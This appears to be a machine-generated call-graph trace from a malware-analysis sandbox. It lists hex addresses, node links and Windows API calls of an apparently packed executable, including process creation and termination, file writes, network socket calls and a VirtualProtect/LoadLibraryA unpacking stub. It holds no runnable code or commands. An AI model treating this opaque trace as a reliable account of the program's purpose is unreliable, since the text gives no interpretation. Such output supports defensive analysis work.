108256->108249 108257->108249 108260 7cc914 108258->108260 108261 7cc8f7 108258->108261 108316 7cc235 417 API calls Mailbox 108260->108316 108261->108260 108262 7ccc61 108261->108262 108263 7cc934 108261->108263 108264 7ccc6e 108262->108264 108265 7ccca9 108262->108265 108263->108260 108294 7aabf3 108263->108294 108312 78d6b4 48 API calls 108264->108312 108265->108260 108270 7cccb6 108265->108270 108267 7cc964 108267->108260 108268 7cc973 108267->108268 108280 7cc9a1 108268->108280 108298 7aa8c8 108268->108298 108314 78d6b4 48 API calls 108270->108314 108271 7ccc87 108313 7b97b6 89 API calls 108271->108313 108275 7cccd6 108315 7b503c 91 API calls Mailbox 108275->108315 108291 7ccc52 108291->108197 108295 7aac16 108294->108295 108296 7aac04 __NMSG_WRITE 108294->108296 108295->108267 108296->108295 108317 773bcf 108296->108317 108312->108271 108313->108291 108314->108275 108315->108291 108316->108291 108318 773bd9 __NMSG_WRITE 108317->108318 108319 79010a 48 API calls 108318->108319 108323 79010a 48 API calls 108322->108323 108324 77a702 108323->108324 108324->108205 108325->108205 108327 77a309 108326->108327 108329 77a321 _memmove 108326->108329 108327->108329 108330 77b8a7 108327->108330 108329->108205 108331 77b8ba 108330->108331 108333 77b8b7 _memmove 108330->108333 108332 79010a 48 API calls 108331->108332 108332->108333 108333->108329 108335 77c4e7 108334->108335 108337 77c4da 108334->108337 108336 79010a 48 API calls 108335->108336 108336->108337 108337->108224 108338->108124 108339->108116 108341 7e787b 108340->108341 108343 78406c 108340->108343 108515 7bd520 86 API calls 4 library calls 108341->108515 108344 7e788c 108343->108344 108352 7840a6 _memmove 108343->108352 108516 7bd520 86 API calls 4 library calls 108344->108516 108346 784175 108351 784185 108346->108351 108514 7cd21a 82 API calls Mailbox 108346->108514 108348 79010a 48 API calls 108348->108352 108349 7841f1 108349->108153 108350 77fa40 417 API calls 108350->108352 108351->108153 108352->108346 108352->108348 108352->108350 108352->108351 108353 7e78d8 108352->108353 108517 7bd520 86 API calls 4 library calls 108353->108517 108356 7750f6 108355->108356 108357 775105 108355->108357 108356->108150 108357->108356 108358 77510a CloseHandle 108357->108358 108358->108356 108518 77cdb4 108359->108518 108361 78f572 108362 78f57a timeGetTime 108361->108362 108363 7e75d1 Sleep 108361->108363 108364 77cdb4 48 API calls 108362->108364 108365 78f590 108364->108365 108523 77e1f0 108365->108523 108369 77d3d2 48 API calls 108368->108369 108370 7d354a 108369->108370 108371 77d3d2 48 API calls 108370->108371 108372 7d3553 108371->108372 108373 77d3d2 48 API calls 108372->108373 108374 7d355c 108373->108374 108375 7784a6 81 API calls 108374->108375 108383 7d35e9 Mailbox 108374->108383 108376 7d3580 108375->108376 108789 7d3d7b 108376->108789 108383->108150 108457 7784a6 81 API calls 108456->108457 108458 7bdcfc 108457->108458 108855 7b6d6d 108458->108855 108460 7bdd06 108460->108150 108462 77cdb4 48 API calls 108461->108462 108463 7c9515 108462->108463 108464 7bbe47 50 API calls 108463->108464 108465 7c9522 108464->108465 108466 7c952f send 108465->108466 108467 7c9546 108466->108467 108468 7c9552 WSAGetLastError 108467->108468 108469 7c956a 108467->108469 108468->108469 108469->108150 108471 7784a6 81 API calls 108470->108471 108472 7c6fd6 SetWindowTextW 108471->108472 108472->108150 108474 7784a6 81 API calls 108473->108474 108475 7beff2 108474->108475 108867 7b78ad GetFullPathNameW 108475->108867 108480 7bf04b CoInitialize CoCreateInstance 108482 7bf08e 108480->108482 108483 7bf070 108480->108483 108484 7784a6 81 API calls 108482->108484 108486 7bf07a CoUninitialize 108483->108486 108508 7c95e0 108507->108508 108508->108150 108883 7c22e5 108509->108883 108511 7c1090 108511->108150 108512->108151 108513->108150 108514->108349 108515->108344 108516->108351 108517->108351 108519 77cdc5 108518->108519 108520 77cdca 108518->108520 108519->108520 108585 792241 48 API calls 108519->108585 108520->108361 108522 77ce07 108522->108361 108524 77e216 108523->108524 108584 77e226 Mailbox 108523->108584 108525 77e670 108524->108525 108524->108584 108654 78ecee 417 API calls 108525->108654 108527 77e4fd 108527->108150 108529 77e681 108529->108527 108530 77e68e 108529->108530 108656 78ec33 417 API calls Mailbox 108530->108656 108531 77e26c PeekMessageW 108531->108584 108533 7e5b13 Sleep 108533->108584 108535 77e4e7 108535->108527 108655 77322e 16 API calls 108535->108655 108540 78cf79 49 API calls 108540->108584 108542 77e657 PeekMessageW 108542->108584 108543 79010a 48 API calls 108543->108584 108544 77e517 timeGetTime 108544->108584 108546 77c935 48 API calls 108546->108584 108547 7e5dfc WaitForSingleObject 108550 7e5e19 GetExitCodeProcess CloseHandle 108547->108550 108547->108584 108548 77e641 TranslateMessage DispatchMessageW 108548->108542 108549 7e6147 Sleep 108576 7e5cce Mailbox 108549->108576 108550->108584 108551 77d3d2 48 API calls 108551->108576 108552 77e6cc timeGetTime 108657 78cf79 49 API calls 108552->108657 108553 7e5feb Sleep 108553->108584 108558 7e61de GetExitCodeProcess 108562 7e620a CloseHandle 108558->108562 108563 7e61f4 WaitForSingleObject 108558->108563 108560 771000 393 API calls 108560->108584 108562->108576 108563->108562 108563->108584 108564 7e5cea Sleep 108564->108584 108566 7e5cd7 Sleep 108566->108564 108567 7d8a48 108 API calls 108567->108576 108568 771dce 107 API calls 108568->108584 108569 7e6266 Sleep 108569->108584 108570 77caee 48 API calls 108570->108576 108575 77fa40 393 API calls 108575->108584 108576->108551 108576->108558 108576->108564 108576->108566 108576->108567 108576->108569 108576->108570 108576->108584 108659 7b56dc 49 API calls Mailbox 108576->108659 108660 78cf79 49 API calls 108576->108660 108661 77d380 108576->108661 108665 771000 417 API calls 108576->108665 108667 7cd12a 50 API calls 108576->108667 108668 7b8355 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 108576->108668 108669 78e3a5 timeGetTime 108576->108669 108670 7b6f5b CreateToolhelp32Snapshot Process32FirstW 108576->108670 108578 7844e0 393 API calls 108578->108584 108579 783680 393 API calls 108579->108584 108581 7bd520 86 API calls 108581->108584 108582 77caee 48 API calls 108582->108584 108583 77d380 55 API calls 108583->108584 108584->108531 108584->108533 108584->108535 108584->108540 108584->108542 108584->108543 108584->108544 108584->108546 108584->108547 108584->108548 108584->108549 108584->108552 108584->108553 108584->108560 108584->108564 108584->108568 108584->108575 108584->108576 108584->108578 108584->108579 108584->108581 108584->108582 108584->108583 108586 77e7e0 108584->108586 108593 77ea00 108584->108593 108643 78f381 108584->108643 108648 78ed1a 108584->108648 108653 77e7b0 417 API calls Mailbox 108584->108653 108658 7d8b20 48 API calls 108584->108658 108666 78e3a5 timeGetTime 108584->108666 108585->108522 108587 77e80f 108586->108587 108588 77e7fd 108586->108588 108708 7bd520 86 API calls 4 library calls 108587->108708 108677 77dcd0 108588->108677 108592 7e98e8 108592->108592 108594 77ea20 108593->108594 108595 77fa40 417 API calls 108594->108595 108596 77ea89 108594->108596 108597 7e9919 108595->108597 108602 77d3d2 48 API calls 108596->108602 108623 77eb18 108596->108623 108627 77ecd7 Mailbox 108596->108627 108597->108596 108720 7bd520 86 API calls 4 library calls 108597->108720 108598 7e99bc 108601 77d3d2 48 API calls 108607 77d380 55 API calls 108607->108627 108609 7e9d70 108611 77342c 48 API calls 108611->108627 108612 7e9e49 108613 77fa40 417 API calls 108613->108627 108614 7e9dc2 108615 7e9ddf 108621 7814a0 48 API calls 108621->108627 108623->108601 108623->108627 108627->108598 108627->108607 108627->108609 108627->108611 108627->108612 108627->108613 108627->108614 108627->108615 108627->108621 108628 77f56f 108627->108628 108629 7bd520 86 API calls 108627->108629 108630 7e9a3c 108627->108630 108642 77ef0c Mailbox 108627->108642 108716 77d805 108627->108716 108724 7ba3ee 48 API calls 108627->108724 108725 7cede9 417 API calls 108627->108725 108730 7aa599 InterlockedDecrement 108627->108730 108731 7cf4df 417 API calls 108627->108731 108628->108642 108629->108627 108642->108584 108645 7eee11 108643->108645 108647 78f390 108643->108647 108644 7eee46 108645->108644 108646 7eee28 TranslateAcceleratorW 108645->108646 108646->108647 108647->108584 108649 78ed2c 108648->108649 108651 78ed34 108648->108651 108649->108584 108650 78ed5e IsDialogMessageW 108650->108649 108650->108651 108651->108649 108651->108650 108652 7eebec GetClassLongW 108651->108652 108652->108650 108652->108651 108653->108584 108654->108535 108655->108529 108657->108584 108658->108584 108659->108576 108660->108576 108662 77d38b 108661->108662 108663 77d3b4 108662->108663 108738 77d772 55 API calls 108662->108738 108663->108576 108665->108576 108666->108584 108667->108576 108668->108576 108669->108576 108739 7b79c2 108670->108739 108678 77fa40 417 API calls 108677->108678 108691 77dd0f _memmove 108678->108691 108708->108592 108720->108596 108724->108627 108725->108627 108730->108627 108731->108627 108738->108663 108740 7b79e9 108739->108740 108744 7b79d0 108739->108744 108759 79224a 58 API calls __wcstoi64 108740->108759 108742 7b79ef 108744->108740 108744->108742 108758 7922df GetStringTypeW __wtof_l 108744->108758 108758->108744 108759->108742 108790 77c4cd 48 API calls 108789->108790 108791 7d3d89 108790->108791 108792 77c4cd 48 API calls 108791->108792 108793 7d3d91 108792->108793 108856 7b6d8a __NMSG_WRITE 108855->108856 108857 7b6db3 GetFileAttributesW 108856->108857 108858 7b6de3 108857->108858 108859 7b6dc5 GetLastError 108857->108859 108858->108460 108860 7b6dd0 CreateDirectoryW 108859->108860 108861 7b6de7 108859->108861 108860->108858 108860->108861 108861->108858 108862 773bcf 48 API calls 108861->108862 108863 7b6df7 _wcsrchr 108862->108863 108863->108858 108864 7b6d6d 48 API calls 108863->108864 108865 7b6e1b 108864->108865 108865->108858 108866 7b6e28 CreateDirectoryW 108865->108866 108866->108858 108868 777e53 48 API calls 108867->108868 108869 7b78df 108868->108869 108870 78e617 48 API calls 108869->108870 108871 7b78eb 108870->108871 108872 7c267a 108871->108872 108873 7c26a4 __NMSG_WRITE 108872->108873 108874 7bf039 108873->108874 108875 7c2763 108873->108875 108876 7c26d8 108873->108876 108874->108480 108879 7739e8 48 API calls 2 library calls 108874->108879 108875->108874 108882 78dfd2 60 API calls 108875->108882 108876->108874 108881 78dfd2 60 API calls 108876->108881 108879->108480 108881->108876 108882->108875 108884 7c2306 108883->108884 108885 7c230a 108884->108885 108886 7c2365 108884->108886 108887 79010a 48 API calls 108885->108887 108952 78f0f3 48 API calls 108886->108952 108889 7c2311 108887->108889 108890 7c231f 108889->108890 108939 775080 49 API calls 108889->108939 108892 7784a6 81 API calls 108890->108892 108895 7c2331 108892->108895 108893 7c2379 108894 7c234d 108893->108894 108897 7c243f 108893->108897 108898 7c23bb 108893->108898 108894->108511 108940 774bf9 108895->108940 108899 7bbe47 50 API calls 108897->108899 108902 7784a6 81 API calls 108898->108902 108903 7c2446 108899->108903 108909 7c23c2 108902->108909 108959 7b689f SetFilePointerEx SetFilePointerEx WriteFile 108903->108959 108905 7c23f6 108921 7b67dc 108905->108921 108906 7c2400 108953 777b6e 108906->108953 108909->108905 108909->108906 108915 7c23fe Mailbox 108915->108894 108917 7750ec CloseHandle 108915->108917 108919 7c2490 108917->108919 108960 774592 CloseHandle 108919->108960 108922 7b67ec 108921->108922 108923 7b67f6 108921->108923 108977 7b6917 SetFilePointerEx SetFilePointerEx WriteFile 108922->108977 108925 7b6808 108923->108925 108926 7b67fc 108923->108926 108938 7b67f4 Mailbox 108938->108915 108939->108890 108941 7750ec CloseHandle 108940->108941 108942 774c04 108941->108942 109017 774b88 108942->109017 108952->108893 108954 79010a 48 API calls 108953->108954 108955 777b93 108954->108955 108956 77a6f8 48 API calls 108955->108956 108959->108915 108960->108894 108977->108938 109018 774ba1 CreateFileW 109017->109018 109019 7e4957 109017->109019 109071->108182 109072->108182 109073->107579 109074->107579 109075->107579 109076->107579 109077->107579 109078->107578 109079->107572 109080->107551 109081->107548 109082->107557 109083->107565 109085 7784a6 81 API calls 109084->109085 109086 7cf7db 109085->109086 109108 7cf81d Mailbox 109086->109108 109120 7d0458 109086->109120 109088 7cfa7c 109089 7cfbeb 109088->109089 109094 7cfa86 109088->109094 109166 7d0579 89 API calls Mailbox 109089->109166 109092 7cfbf8 109093 7cfc04 109092->109093 109092->109094 109093->109108 109133 7cf5fb 109094->109133 109095 7784a6 81 API calls 109113 7cf875 Mailbox 109095->109113 109100 7cfaba 109147 78f92c 109100->109147 109103 7cfaee 109154 773320 109103->109154 109104 7cfad4 109153 7bd520 86 API calls 4 library calls 109104->109153 109107 7cfadf GetCurrentProcess TerminateProcess 109107->109103 109108->107601 109109 7cfb05 109110 7814a0 48 API calls 109109->109110 109119 7cfb2f 109109->109119 109113->109088 109113->109095 109113->109108 109113->109113 109151 7d28d9 48 API calls _memmove 109113->109151 109152 7cfc96 60 API calls 2 library calls 109113->109152 109121 77b8a7 48 API calls 109120->109121 109122 7d0473 CharLowerBuffW 109121->109122 109123 7c267a 60 API calls 109122->109123 109124 7d0494 109123->109124 109126 77d3d2 48 API calls 109124->109126 109132 7d04cf Mailbox 109124->109132 109127 7d04ac 109126->109127 109128 777f40 48 API calls 109127->109128 109130 7d04c3 109128->109130 109129 7d050b Mailbox 109129->109113 109131 77a2fb 48 API calls 109130->109131 109131->109132 109132->109129 109168 7cfc96 60 API calls 2 library calls 109132->109168 109134 7cf66b 109133->109134 109135 7cf616 109133->109135 109139 7d0719 109134->109139 109136 79010a 48 API calls 109135->109136 109137 7cf638 109136->109137 109137->109134 109138 79010a 48 API calls 109137->109138 109138->109137 109140 7d0944 Mailbox 109139->109140 109146 7d073c _strcat _wcscpy __NMSG_WRITE 109139->109146 109140->109100 109141 77d00b 58 API calls 109141->109146 109142 77cdb4 48 API calls 109142->109146 109143 7784a6 81 API calls 109143->109146 109144 7945ec 47 API calls std::exception::_Copy_str 109144->109146 109146->109140 109146->109141 109146->109142 109146->109143 109146->109144 109169 7b8932 50 API calls __NMSG_WRITE 109146->109169 109148 78f941 109147->109148 109149 78f9d9 select 109148->109149 109150 78f9a7 109148->109150 109149->109150 109150->109103 109150->109104 109151->109113 109152->109113 109153->109107 109155 773334 109154->109155 109157 773339 Mailbox 109154->109157 109156 77342c 48 API calls 109155->109156 109156->109157 109162 773347 109157->109162 109170 77346e 48 API calls 109157->109170 109159 79010a 48 API calls 109161 7733d8 109159->109161 109160 773422 109160->109109 109163 79010a 48 API calls 109161->109163 109162->109159 109162->109160 109166->109092 109168->109129 109169->109146 109170->109162 109172 7d23eb _memset 109171->109172 109173 7d2428 109172->109173 109174 7d2452 109172->109174 109175 77cdb4 48 API calls 109173->109175 109178 77cdb4 48 API calls 109174->109178 109179 7d2476 109174->109179 109176 7d2433 109175->109176 109176->109179 109181 77cdb4 48 API calls 109176->109181 109177 7d24b0 109183 7784a6 81 API calls 109177->109183 109180 7d2448 109178->109180 109179->109177 109182 77cdb4 48 API calls 109179->109182 109185 77cdb4 48 API calls 109180->109185 109181->109180 109182->109177 109184 7d24d4 109183->109184 109186 773bcf 48 API calls 109184->109186 109185->109179 109187 7d24de 109186->109187 109188 7d24e8 109187->109188 109189 7d25a1 109187->109189 109191 7784a6 81 API calls 109188->109191 109190 7d25d3 GetCurrentDirectoryW 109189->109190 109192 7784a6 81 API calls 109189->109192 109193 79010a 48 API calls 109190->109193 109194 7d24f9 109191->109194 109197 7d25b8 109192->109197 109195 7d25f8 GetCurrentDirectoryW 109193->109195 109196 773bcf 48 API calls 109194->109196 109198 7d2605 109195->109198 109199 7d2503 109196->109199 109200 773bcf 48 API calls 109197->109200 109204 77ca8e 48 API calls 109198->109204 109211 7d263e 109198->109211 109201 7784a6 81 API calls 109199->109201 109202 7d25c2 __NMSG_WRITE 109200->109202 109203 7d2514 109201->109203 109202->109190 109202->109211 109205 773bcf 48 API calls 109203->109205 109206 7d261e 109204->109206 109207 7d251e 109205->109207 109208 77ca8e 48 API calls 109206->109208 109209 7784a6 81 API calls 109207->109209 109212 7d262e 109208->109212 109213 7d252f 109209->109213 109210 7d268a 109215 7d274c CreateProcessW 109210->109215 109216 7d26c1 109210->109216 109211->109210 109249 7ba17a 8 API calls 109211->109249 109217 77ca8e 48 API calls 109212->109217 109218 773bcf 48 API calls 109213->109218 109230 7d276b 109215->109230 109252 7abc90 69 API calls 109216->109252 109217->109211 109221 7d2539 109218->109221 109219 7d2655 109250 7ba073 8 API calls 109219->109250 109224 7d256f GetSystemDirectoryW 109221->109224 109227 7784a6 81 API calls 109221->109227 109223 7d2670 109251 7ba102 8 API calls 109223->109251 109226 79010a 48 API calls 109224->109226 109228 7d2594 GetSystemDirectoryW 109226->109228 109229 7d2550 109227->109229 109228->109198 109231 773bcf 48 API calls 109229->109231 109232 7d27bd CloseHandle 109230->109232 109233 7d2780 109230->109233 109234 7d255a __NMSG_WRITE 109231->109234 109235 7d27cb 109232->109235 109241 7d27f5 109232->109241 109237 7d2791 GetLastError 109233->109237 109234->109198 109234->109224 109253 7b9d09 CloseHandle Mailbox 109235->109253 109236 7d27fb 109239 7d27a5 109236->109239 109237->109239 109254 7b9b29 CloseHandle 109239->109254 109241->109236 109244 7d2827 CloseHandle 109241->109244 109244->109239 109245 7d1f2b 109245->107445 109248 7d26df __NMSG_WRITE 109248->109230 109249->109219 109250->109223 109251->109210 109252->109248 109254->109245 109255->107646 109257 77d89e 50 API calls 109256->109257 109258 771a08 109257->109258 109259 7edb7d 109258->109259 109260 771a12 109258->109260 109261 777e53 48 API calls 109259->109261 109262 7784a6 81 API calls 109260->109262 109263 7edb8d 109261->109263 109264 771a1f 109262->109264 109263->109263 109265 77c935 48 API calls 109264->109265 109266 771a2d 109265->109266 109267 771dce 109266->109267 109268 771de4 Mailbox 109267->109268 109269 7edb26 109268->109269 109272 771dfd 109268->109272 109270 7edb2b IsWindow 109269->109270 109273 7edb3f 109270->109273 109274 771e51 109270->109274 109271 771e46 109271->109274 109277 7edb65 IsWindow 109271->109277 109272->109271 109275 7784a6 81 API calls 109272->109275 109358 77200a 109273->109358 109274->107664 109274->107665 109278 771e17 109275->109278 109277->109273 109277->109274 109305 771f04 109278->109305 109283 77c4cd 48 API calls 109282->109283 109284 7ae2fe 109283->109284 109403 77193b SendMessageTimeoutW 109284->109403 109286 7ae305 109298 7ae309 Mailbox 109286->109298 109404 7ae390 109286->109404 109288 7ae314 109289 79010a 48 API calls 109288->109289 109290 7ae338 SendMessageW 109289->109290 109290->109298 109298->107670 109300 777c3a 109299->109300 109302 777bfb 109299->109302 109301 77c935 48 API calls 109300->109301 109304 777c0e 109301->109304 109303 79010a 48 API calls 109302->109303 109303->109304 109304->107672 109306 771f1a Mailbox 109305->109306 109307 77c935 48 API calls 109306->109307 109308 771f3e 109307->109308 109309 77c935 48 API calls 109308->109309 109310 771f49 109309->109310 109311 777e53 48 API calls 109310->109311 109312 771f59 109311->109312 109313 77d3d2 48 API calls 109312->109313 109314 771f87 109313->109314 109315 77d3d2 48 API calls 109314->109315 109316 771f90 109315->109316 109317 77d3d2 48 API calls 109316->109317 109318 771f99 109317->109318 109319 7e2569 109318->109319 109320 771fac 109318->109320 109359 772016 109358->109359 109360 79010a 48 API calls 109359->109360 109361 772023 109360->109361 109362 77197e 109361->109362 109363 771990 109362->109363 109367 7719af _memmove 109362->109367 109366 79010a 48 API calls 109363->109366 109364 79010a 48 API calls 109365 7719c6 109364->109365 109365->109274 109366->109367 109367->109364 109403->109286 109429 77193b SendMessageTimeoutW 109404->109429 109406 7ae39a 109407 7ae39e 109406->109407 109408 7ae3a2 SendMessageW 109406->109408 109407->109288 109408->109288 109429->109406 109430->107686 109431->107701 109432->107701 109433->107713 109434->107706 109435->107701 109436->107703 109437->107722 109438->107734 109439->107745 109440->107742 109442 7b7700 109441->109442 109453 7b76f9 _wcsncpy 109441->109453 109443 79010a 48 API calls 109442->109443 109444 7b7706 GetFileVersionInfoW 109443->109444 109445 7b7722 __NMSG_WRITE 109444->109445 109446 79010a 48 API calls 109445->109446 109448 7b7739 _wcscat _wcscmp _wcscpy _wcsstr 109446->109448 109447 791bc7 _W_store_winword 59 API calls 109449 7b77f7 109447->109449 109451 7b7779 751C1560 109448->109451 109455 7b7793 _wcscat 109448->109455 109450 7b7827 751C1560 109449->109450 109449->109453 109452 7b783d _wcscmp 109450->109452 109450->109453 109451->109455 109452->109453 109456 79234b 80 API calls 3 library calls 109452->109456 109453->107759 109455->109447 109456->109453 109458 78f069 109457->109458 109459 78f057 109457->109459 109460 77c4cd 48 API calls 109458->109460 109461 78f05d 109459->109461 109462 78f063 109459->109462 109473 7b64f5 109460->109473 109464 77a6d4 48 API calls 109461->109464 109463 77a6d4 48 API calls 109462->109463 109465 7b668b 109463->109465 109467 78f081 109464->109467 109468 774c4f 50 API calls 109465->109468 109466 7b6524 109466->107802 109486 774c4f 109467->109486 109472 7b6699 109468->109472 109479 7b66a9 Mailbox 109472->109479 109494 7b6765 50 API calls 109472->109494 109473->109466 109492 7b649b ReadFile SetFilePointerEx 109473->109492 109493 77bd2f 48 API calls _memmove 109473->109493 109474 7e49b2 109475 77c610 50 API calls 109478 78f0a3 Mailbox 109475->109478 109478->107802 109479->107802 109480->107779 109481->107807 109482->107776 109483->107782 109484->107798 109485->107805 109487 78f324 48 API calls 109486->109487 109488 774c60 109487->109488 109489 774ca0 2 API calls 109488->109489 109490 774c95 109488->109490 109495 774d29 109488->109495 109489->109488 109490->109474 109490->109475 109492->109473 109493->109473 109494->109479 109496 7e45cf 109495->109496 109497 774d3d 109495->109497 109499 77a6f8 48 API calls 109496->109499 109504 774d67 109497->109504 109501 7e45da 109499->109501 109500 774d49 109500->109488 109502 79010a 48 API calls 109501->109502 109503 7e45ef _memmove 109502->109503 109505 774d7d 109504->109505 109508 774d78 _memmove 109504->109508 109506 7e4703 109505->109506 109507 79010a 48 API calls 109505->109507 109507->109508 109508->109500 109509->107816 109510->107835 109511->107838 109512->107901 109513->107901 109515 79010a 48 API calls 109514->109515 109516 77818f 109515->109516 109516->107901 109517->107901 109518->107881 109519->107881 109520->107881 109521->107901 109522->107851 109523->107908 109524->107875 109525->107871 109526->107887 109527->107868 109528->107933 109529->107935 109530->107937 109532 7c6b25 GetWindowRect 109531->109532 109533 7c6b42 109531->109533 109534 7c6b5c 109532->109534 109533->109534 109535 7c6b52 ClientToScreen 109533->109535 109534->107941 109534->107945 109535->109534 109536->107947 109537->107951 109546 7cae3b 109538->109546 109541 7cad05 Mailbox 109542 7cad31 htons 109541->109542 109543 7cad1b 109541->109543 109542->109543 109543->107968 109545 7bd7f2 109544->109545 109545->107975 109547 77a6d4 48 API calls 109546->109547 109548 7cae49 109547->109548 109551 7cae79 WideCharToMultiByte 109548->109551 109550 7cacf3 inet_addr 109550->109541 109552 7cae9d 109551->109552 109553 7caea7 109551->109553 109554 78f324 48 API calls 109552->109554 109555 79010a 48 API calls 109553->109555 109556 7caea5 109554->109556 109557 7caeae WideCharToMultiByte 109555->109557 109556->109550 109558 78f2d0 48 API calls 109557->109558 109558->109556 109560 7e4a7d FindFirstFileW 109559->109560 109561 78dd89 109559->109561 109562 7e4a8e 109560->109562 109563 7e4a95 FindClose 109560->109563 109561->107445 109562->109563 109565 77a9af 109564->109565 109568 77a9ca 109564->109568 109566 77b8a7 48 API calls 109565->109566 109567 77a9b7 CharUpperBuffW 109566->109567 109567->109568 109568->107990 109570 7e4c5a 109569->109570 109571 7710f9 109569->109571 109572 79010a 48 API calls 109571->109572 109573 771100 109572->109573 109574 771121 109573->109574 109603 77113c 48 API calls 109573->109603 109574->108012 109576->107998 109577->108047 109578->108047 109579->108047 109580->108057 109581->107998 109583 77d2df 109582->109583 109585 77d30a 109582->109585 109587 77d2e6 109583->109587 109605 77d349 53 API calls 109583->109605 109585->108014 109585->108015 109587->109585 109604 77d349 53 API calls 109587->109604 109588->108050 109589->108041 109590->108041 109591->107997 109592->108050 109593->108026 109594->108050 109595->108050 109596->108050 109597->108047 109598->108047 109599->108047 109600->108050 109601->108045 109602->108050 109603->109574 109604->109585 109605->109587 109606->108067 109607 7e4ddc 109608 7e4de6 VariantClear 109607->109608 109609 784472 109607->109609 109608->109609 109610 77e834 109613 782b40 109610->109613 109612 77e840 109614 782b98 109613->109614 109680 782bfc __NMSG_WRITE _memmove 109613->109680 109615 782bbf 109614->109615 109616 7833cb 109614->109616 109617 7e7cf3 109614->109617 109618 79010a 48 API calls 109615->109618 109688 775577 417 API calls Mailbox 109616->109688 109620 7e7cf8 109617->109620 109627 7e7d15 109617->109627 109621 782be8 109618->109621 109620->109615 109624 7e7d01 109620->109624 109622 79010a 48 API calls 109621->109622 109622->109680 109623 7e7d38 109693 7bd520 86 API calls 4 library calls 109623->109693 109691 7cd443 417 API calls Mailbox 109624->109691 109627->109623 109692 7cd8ff 417 API calls 2 library calls 109627->109692 109628 78366d 109712 7bd520 86 API calls 4 library calls 109628->109712 109631 7e8518 109631->109612 109632 7e83d1 109700 7bd520 86 API calls 4 library calls 109632->109700 109633 7e84df 109711 7bd520 86 API calls 4 library calls 109633->109711 109636 77ca8e 48 API calls 109636->109680 109637 7e83eb 109701 7bd520 86 API calls 4 library calls 109637->109701 109638 7e7e43 109694 7bd520 86 API calls 4 library calls 109638->109694 109639 77d380 55 API calls 109639->109680 109640 7e8434 109703 7bd520 86 API calls 4 library calls 109640->109703 109642 77d3d2 48 API calls 109642->109680 109644 77d2d2 53 API calls 109644->109680 109646 7e844e 109704 7bd520 86 API calls 4 library calls 109646->109704 109647 77d349 53 API calls 109647->109680 109648 791b2a 52 API calls __cinit 109648->109680 109649 77d89e 50 API calls 109649->109680 109650 78345e 109702 7bd520 86 API calls 4 library calls 109650->109702 109652 7e84b5 109709 7bd520 86 API calls 4 library calls 109652->109709 109654 7e84c8 109710 7bd520 86 API calls 4 library calls 109654->109710 109658 777e53 48 API calls 109658->109680 109660 77fa40 417 API calls 109660->109680 109662 7e81d7 109697 7cd154 48 API calls 109662->109697 109664 783637 109705 7bd520 86 API calls 4 library calls 109664->109705 109665 7e84a4 109708 7bd520 86 API calls 4 library calls 109665->109708 109666 773320 48 API calls 109666->109680 109667 783157 109667->109612 109670 7e822c 109699 77346e 48 API calls 109670->109699 109671 77cdb4 48 API calls 109671->109680 109673 77c935 48 API calls 109673->109680 109676 7e826c 109676->109667 109707 7bd520 86 API calls 4 library calls 109676->109707 109677 7e81ea 109677->109670 109698 7cd154 48 API calls 109677->109698 109679 7e8259 109681 773320 48 API calls 109679->109681 109680->109628 109680->109632 109680->109633 109680->109636 109680->109637 109680->109638 109680->109639 109680->109640 109680->109642 109680->109644 109680->109646 109680->109647 109680->109648 109680->109649 109680->109650 109680->109652 109680->109654 109680->109658 109680->109660 109680->109662 109680->109664 109680->109665 109680->109666 109680->109667 109680->109671 109680->109673 109680->109676 109682 79010a 48 API calls 109680->109682 109685 7aa599 InterlockedDecrement 109680->109685 109689 77346e 48 API calls 109680->109689 109690 77203a 417 API calls 109680->109690 109695 7cd154 48 API calls 109680->109695 109696 7bab1c 50 API calls 109680->109696 109684 7e8261 109681->109684 109682->109680 109683 7e8236 109683->109664 109683->109679 109684->109676 109686 7e8478 109684->109686 109685->109680 109706 7bd520 86 API calls 4 library calls 109686->109706 109688->109667 109689->109680 109690->109680 109691->109667 109692->109623 109693->109680 109694->109667 109695->109680 109696->109680 109697->109677 109698->109677 109699->109683 109700->109637 109701->109667 109702->109667 109703->109646 109704->109667 109705->109667 109706->109667 109707->109667 109708->109667 109709->109667 109710->109667 109711->109667 109712->109631 109713 7ec05b 109714 7ec05d 109713->109714 109717 7b78ee WSAStartup 109714->109717 109716 7ec066 109718 7b7917 gethostname gethostbyname 109717->109718 109719 7b79b1 _wcscpy 109717->109719 109718->109719 109720 7b793a _memmove 109718->109720 109719->109716 109721 7b7970 inet_ntoa 109720->109721 109725 7b7952 _wcscpy 109720->109725 109723 7b7989 _strcat 109721->109723 109722 7b79a9 WSACleanup 109722->109719 109726 7b8553 109723->109726 109725->109722 109728 7b8565 _strlen 109726->109728 109729 7b8561 109726->109729 109727 7b8574 MultiByteToWideChar 109727->109729 109730 7b858a 109727->109730 109728->109727 109729->109725 109731 79010a 48 API calls 109730->109731 109732 7b85a6 MultiByteToWideChar 109731->109732 109732->109729 109733 7e1edb 109738 77131c 109733->109738 109739 77133e 109738->109739 109772 771624 109739->109772 109744 77d3d2 48 API calls 109745 77137e 109744->109745 109746 77d3d2 48 API calls 109745->109746 109747 771388 109746->109747 109748 77d3d2 48 API calls 109747->109748 109749 771392 109748->109749 109750 77d3d2 48 API calls 109749->109750 109751 7713d8 109750->109751 109752 77d3d2 48 API calls 109751->109752 109753 7714bb 109752->109753 109780 771673 109753->109780 109818 7717e0 109772->109818 109775 777e53 48 API calls 109776 771344 109775->109776 109777 7716db 109776->109777 109832 771867 6 API calls 109777->109832 109779 771374 109779->109744 109781 77d3d2 48 API calls 109780->109781 109782 771683 109781->109782 109783 77d3d2 48 API calls 109782->109783 109784 77168b 109783->109784 109833 777d70 109784->109833 109787 777d70 48 API calls 109788 77169b 109787->109788 109825 7717fc 109818->109825 109821 7717fc 48 API calls 109822 7717f0 109821->109822 109823 77d3d2 48 API calls 109822->109823 109824 77165b 109823->109824 109824->109775 109826 77d3d2 48 API calls 109825->109826 109827 771807 109826->109827 109828 77d3d2 48 API calls 109827->109828 109829 77180f 109828->109829 109830 77d3d2 48 API calls 109829->109830 109831 7717e8 109830->109831 109831->109821 109832->109779 109834 77d3d2 48 API calls 109833->109834 109835 777d79 109834->109835 109836 77d3d2 48 API calls 109835->109836 109837 771693 109836->109837 109837->109787 109840 8da0c0 109841 8da0d0 109840->109841 109842 8da1ea LoadLibraryA 109841->109842 109845 8da22f VirtualProtect VirtualProtect 109841->109845 109843 8da201 109842->109843 109843->109841 109847 8da213 GetProcAddress 109843->109847 109846 8da294 109845->109846 109846->109846 109847->109843 109848 8da229 ExitProcess 109847->109848 109849 780ff7 109850 78e016 50 API calls 109849->109850 